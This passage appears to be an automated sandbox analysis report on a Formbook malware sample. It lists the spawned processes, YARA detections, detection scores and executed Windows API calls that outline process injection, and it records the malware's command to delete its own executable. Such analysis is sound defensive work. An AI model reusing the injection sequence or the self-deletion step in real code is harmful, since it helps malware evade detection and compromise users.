                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 15%, ReversingLabs
                                  Reputation:low

                                  General

                                  Start time:15:24:19
                                  Start date:10/06/2021
                                  Path:C:\Users\Public\vbc.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\Public\vbc.exe
                                  Imagebase:0x1000000
                                  File size:993792 bytes
                                  MD5 hash:15D907E7D9F8286E5053796C9D78FCEC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:low

                                  General

                                  Start time:15:24:21
                                  Start date:10/06/2021
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:
                                  Imagebase:0xffca0000
                                  File size:3229696 bytes
                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:high

                                  General

                                  Start time:15:24:34
                                  Start date:10/06/2021
                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                  Imagebase:0x590000
                                  File size:27136 bytes
                                  MD5 hash:CABB20E171770FF64614A54C1F31C033
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:moderate

                                  General

                                  Start time:15:24:38
                                  Start date:10/06/2021
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:/c del 'C:\Users\Public\vbc.exe'
                                  Imagebase:0x4a4c0000
                                  File size:302592 bytes
                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Disassembly

                                  Code Analysis

                                    Executed Functions

                                    APIs
                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 009BAD8F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 009BA803
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 009BA942
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 009BA6B2
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 009B6B3F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 009B6B3F
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 009BA587
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ResumeThread.KERNELBASE(?), ref: 009B9E66
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ResumeThread.KERNELBASE(?), ref: 009B9E66
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: @2Bm
                                    • API String ID: 0-1827899069
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: $
                                    • API String ID: 0-3993045852
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: zA
                                    • API String ID: 0-2513629829
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: LA
                                    • API String ID: 0-2113221690
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: LA
                                    • API String ID: 0-2113221690
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: 3"}
                                    • API String ID: 0-2222199070
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: {A
                                    • API String ID: 0-2362033092
                                    Uniqueness

                                    Uniqueness Score: -1.00%


                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 90276392aac0e5321a5a289a7c181ebfccfc21924d7bdc4ef5551b2dffc2419d
                                    • Instruction ID: 7d0680ec7dab13780ffceb22c175183dd76e59ab5764a706661f306a15d195e6
                                    • Opcode Fuzzy Hash: 90276392aac0e5321a5a289a7c181ebfccfc21924d7bdc4ef5551b2dffc2419d
                                    • Instruction Fuzzy Hash: C2F01470C49248AFCB41DFB8D8486DDBFB0AB0A200F2045AAC449E3252EB784A81CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0f37bf91c329413955c4c75d905db77afd5d60096f6b448b5006f002ed86c763
                                    • Instruction ID: eef88a421dfd907b4f289a82c2ecfab86793dd4583863b3b24712e81de92e82a
                                    • Opcode Fuzzy Hash: 0f37bf91c329413955c4c75d905db77afd5d60096f6b448b5006f002ed86c763
                                    • Instruction Fuzzy Hash: 86F03070A51208ABD718DBB2D581EAFB3BADFD9304F609C98800627240DF386F40E615
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e8107dc468e70e24dde7d020b161d8cf70f6d9d16dcda3bdbc81e87efdfb9443
                                    • Instruction ID: aed2e33e88d5ae645d22af3867bad3207f6de737042f9280aec599d2f5ee05d4
                                    • Opcode Fuzzy Hash: e8107dc468e70e24dde7d020b161d8cf70f6d9d16dcda3bdbc81e87efdfb9443
                                    • Instruction Fuzzy Hash: C3F0E530C502598BDB189BA5C9197EEBBB8AB49304F201829C10173291CFB81884C7E5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 22804825909dc4cd49fdffcf4c90ccd864d058dd5220e0e401124a2c0c7debe2
                                    • Instruction ID: 2894cca03c533ab2e13e1cec115745a179abbf1131c8f68d9af95753eb5030d0
                                    • Opcode Fuzzy Hash: 22804825909dc4cd49fdffcf4c90ccd864d058dd5220e0e401124a2c0c7debe2
                                    • Instruction Fuzzy Hash: B4F0B270D40208EFCB40EFB8D9486AEBBF4BB48305F2045AAD418A3350EB749A80CF41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 36047ce7fef79a05f54ecbd154e9effe890ce70c53648839d2f51d5210464bf3
                                    • Instruction ID: 65deb570af308f4f9f1a677eb53d99e8ce80a0ff913a9834e1b6e7f5469db12d
                                    • Opcode Fuzzy Hash: 36047ce7fef79a05f54ecbd154e9effe890ce70c53648839d2f51d5210464bf3
                                    • Instruction Fuzzy Hash: D9F06D3085E3C89FCB05DBB8985519DBFF4AB87211F1401EEC88AD3253E7394A49CB82
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1d14b0ac2b4c67721bfb4c16248b267a08f7c36296a317582fd538a5882e2be5
                                    • Instruction ID: 3691a37f9b12e62e0bfd9ddd8a5107952f8cc48970d4af49c5b092073068f19f
                                    • Opcode Fuzzy Hash: 1d14b0ac2b4c67721bfb4c16248b267a08f7c36296a317582fd538a5882e2be5
                                    • Instruction Fuzzy Hash: 84E01A34D05208EFCB55EFFAE54869CBBF9AB88305F2044A9E80993361EB715AD4DB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cb623f16b1dde1a6791dcb6777b9388e648dc9260927874e42063e4f1e6b1c70
                                    • Instruction ID: a604a00cba1c87df8516786276bbe0eb8881cabdb54f94275bbf22f477a11436
                                    • Opcode Fuzzy Hash: cb623f16b1dde1a6791dcb6777b9388e648dc9260927874e42063e4f1e6b1c70
                                    • Instruction Fuzzy Hash: 6DE032349282489FCB44DFA9C888A9CBFF0AB0A210F2040E9C80997322E3314A64CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 50fb74448efcf89974efb18e157a76b37cdf89d875ca4941b564e25a9e414ace
                                    • Instruction ID: db777eb80b282447d792da061bd8d59eaff5aab36857299712479de66364acf8
                                    • Opcode Fuzzy Hash: 50fb74448efcf89974efb18e157a76b37cdf89d875ca4941b564e25a9e414ace
                                    • Instruction Fuzzy Hash: 88E0466044E6849FC7069AA15814AA97FB55B53208B1505DAC089932A3E2690A48CB02
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6a52d5e486a81588dbe7c53d5a6e29ebe36e3ed70eeb96585ed6f01817793700
                                    • Instruction ID: 21baa200b4f882cb17a2bc7ec819c778ae9f63ef41f0c258b1bccf2eacd21236
                                    • Opcode Fuzzy Hash: 6a52d5e486a81588dbe7c53d5a6e29ebe36e3ed70eeb96585ed6f01817793700
                                    • Instruction Fuzzy Hash: F6E0E230D1624CAFCB48EFE998456ADBBF8AB85605F2040A9C909A3341EB305B948B81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2deba08b03c07b908df5d3b3ec1d9502d3158bdaac2de193375c0a90b7cfbefd
                                    • Instruction ID: 7b3d0c4bb1cefb02e613354709987a37385b83885744334e11813cf2062a4b3e
                                    • Opcode Fuzzy Hash: 2deba08b03c07b908df5d3b3ec1d9502d3158bdaac2de193375c0a90b7cfbefd
                                    • Instruction Fuzzy Hash: 44D05E35901209CBCB00CFA4E0442EDBBB1FB8C325F241069C109B3740C7354AC0CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3a8bd1803d0c9fb20a14acb547722499f360fc826e1d2cbd146ecf83fbf42306
                                    • Instruction ID: 86dced634f0ec0cb59c89c7f34355daba2deac0f3feb8c203c4b0c23d30f9dfd
                                    • Opcode Fuzzy Hash: 3a8bd1803d0c9fb20a14acb547722499f360fc826e1d2cbd146ecf83fbf42306
                                    • Instruction Fuzzy Hash: 3FD0C935A41208DB8B10CFA4E4451DDBB71EB8D276F1010A9C509B3310D7355991CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8ee9650d79906cbbe5abcdcdc2504f8740343f9c33197fc58ae1f8431c49289e
                                    • Instruction ID: 214057c6bfdc7a539cce27fafa682fcafae85d367a398bf26088a2eeb7822659
                                    • Opcode Fuzzy Hash: 8ee9650d79906cbbe5abcdcdc2504f8740343f9c33197fc58ae1f8431c49289e
                                    • Instruction Fuzzy Hash: 15E02D70909529AFCB658F20CD446D9BAB1BB49300F5185D9A40DA2210EF305B80AF10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 110af12a6dbfc32b9c3baa0ce5343a42c144eebe2af88399f353bff9d8f16de5
                                    • Instruction ID: 8bc1c7f9235891e6ba2d76be1a27b1189c891aaf174c1b8bef47ee0e855f90e0
                                    • Opcode Fuzzy Hash: 110af12a6dbfc32b9c3baa0ce5343a42c144eebe2af88399f353bff9d8f16de5
                                    • Instruction Fuzzy Hash: 82D01770E05669CBEB58DFA9C882A8DFBF2BB98300F20C199C018EB654D7308A408F10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b86e5b33aa4b934e51afb4e53f6ada1008c697b86b5811c161513b0112190ec3
                                    • Instruction ID: 9d2695a1691cf91e78e7f37862efd51d700d9d39c6b5e75ac2d499f49db3f571
                                    • Opcode Fuzzy Hash: b86e5b33aa4b934e51afb4e53f6ada1008c697b86b5811c161513b0112190ec3
                                    • Instruction Fuzzy Hash: B351E6B4E0420A9FCB48CFAAC5815EEFBF2FF88350F24D92AC515A7254D7349A418F94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4f771a57c339e84ff3bee8379cc5116f440df992b2a6359f4f363e55a86f1cfe
                                    • Instruction ID: 9234643be8703f0c7183dabfcfe459d3c71224b96839e66db695eab275c7af1b
                                    • Opcode Fuzzy Hash: 4f771a57c339e84ff3bee8379cc5116f440df992b2a6359f4f363e55a86f1cfe
                                    • Instruction Fuzzy Hash: 7441F7B4E0420A9FCB48CFAAC5815EEFBF2BF88350F24C52AC515E7254D73496418F94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a5bb95e8c370eecc970dd2295be4504fa4f7dc350928106bf3134f35414a1ac6
                                    • Instruction ID: 4cd2cd331a9347b7bec9caa07abaac33555d53f06bc7deb21b7e01e73c6d035a
                                    • Opcode Fuzzy Hash: a5bb95e8c370eecc970dd2295be4504fa4f7dc350928106bf3134f35414a1ac6
                                    • Instruction Fuzzy Hash: 97411874E11218DFDB58CFA9D941B9EBBF6BF88310F1484AAD509A7264DB305A41CF60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b55eb74ffe7df04c1efe9665ecec6529a61e4d1ce1ebe3cbff9b47373b503a41
                                    • Instruction ID: 4f8c790f896cf0705c7ecb93fbed8e116c71f93ba61398a85d7ebae79a6e78bc
                                    • Opcode Fuzzy Hash: b55eb74ffe7df04c1efe9665ecec6529a61e4d1ce1ebe3cbff9b47373b503a41
                                    • Instruction Fuzzy Hash: A841E8B0D0560ADBCB04CFAAC6815EEFBF2BF89310F24C56AD405B7254D7349A418F95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5576c015049c3eca679f67cb799dd1f68afd8c73ce9e5fc339273b4389709f4f
                                    • Instruction ID: dba59f1675edbf0d634f4cf0c56f61e0ac7e6370bd4a899b380ecda9ee8bdf8f
                                    • Opcode Fuzzy Hash: 5576c015049c3eca679f67cb799dd1f68afd8c73ce9e5fc339273b4389709f4f
                                    • Instruction Fuzzy Hash: 18414E71E11618CBEB18CF6B8D4429EFBF7AFC9301F14C1BA850CA6225EB341A859F51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dbd7eebbc3ab000cc394daedd81a15918adf63b2e4b241b4975af35d5d98ca77
                                    • Instruction ID: 06bc84e00e27abd33c0bdf7b7762d5e9e84661feb1e7ab08baa63a9d05af15a1
                                    • Opcode Fuzzy Hash: dbd7eebbc3ab000cc394daedd81a15918adf63b2e4b241b4975af35d5d98ca77
                                    • Instruction Fuzzy Hash: 894168B4E11218DFDB58CFA9C940B9EBBF6BF89310F1484AAD408A7365DB305A41CF60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b1fc4bd8a979042cbc5365f246de54774e1ca7accd3ac5f08254b2a80342d210
                                    • Instruction ID: 64ed81f05aa64a89d82eb8c6fbb4be3c3487755a6f69426b7e997620599efd85
                                    • Opcode Fuzzy Hash: b1fc4bd8a979042cbc5365f246de54774e1ca7accd3ac5f08254b2a80342d210
                                    • Instruction Fuzzy Hash: B741E8B4E0560ADBCB04CFAAC6815EEFBF2BF88310F24C56AD405B7254D7349A818F95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c71ab66a125f8a7370d2f835dcdc85c96401c4b5f0981fa3bbfb2340c2ff87ba
                                    • Instruction ID: 7ea70abb99d6cfa6e710df61931468662c7184d12391c26c5d9a90eef8bcdc3c
                                    • Opcode Fuzzy Hash: c71ab66a125f8a7370d2f835dcdc85c96401c4b5f0981fa3bbfb2340c2ff87ba
                                    • Instruction Fuzzy Hash: 06412E71E056548BEB5DCF6B9C4479AFAF7AFC9300F14C1BAC40CAA255DB7006868F11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5ee72a7b4cb238940901ad4c95358dda70cc938a08909a2e830867b6070ec609
                                    • Instruction ID: 04e302e219743205f043df5e1c9af89f0d12c3cb4a7ed45e153ba14a00912ad2
                                    • Opcode Fuzzy Hash: 5ee72a7b4cb238940901ad4c95358dda70cc938a08909a2e830867b6070ec609
                                    • Instruction Fuzzy Hash: 96314470C07218CBDB00CFA5C588BEDBAF5AF0A324F105429E405B3291E7788980DF55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 008ba25475cbfe29e6618ff6917bf81c14a6bbe9a2f49b960057f8a730a1f9b2
                                    • Instruction ID: 3387ef3d8811dd4313882b2cd09c3510bd309ac23e76a9d1db86a7c9089166c5
                                    • Opcode Fuzzy Hash: 008ba25475cbfe29e6618ff6917bf81c14a6bbe9a2f49b960057f8a730a1f9b2
                                    • Instruction Fuzzy Hash: 7421BC71E056589BEB19CF6B9C506DEFBF3AFC9200F14C17AC908A6265EB3405468F51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f7afdf4aabe5a64fbed0c5f556dbbcd06b459517f6f71d399f0d388741eebae2
                                    • Instruction ID: d25d3b7a3159e3c2673e37072aa027ae49977963b83c9791e3ae88a672d86d49
                                    • Opcode Fuzzy Hash: f7afdf4aabe5a64fbed0c5f556dbbcd06b459517f6f71d399f0d388741eebae2
                                    • Instruction Fuzzy Hash: B0111771E156199BDB18CFAAD9446DEFBF7ABC8310F14C13AD508A7214EB305A42CF91
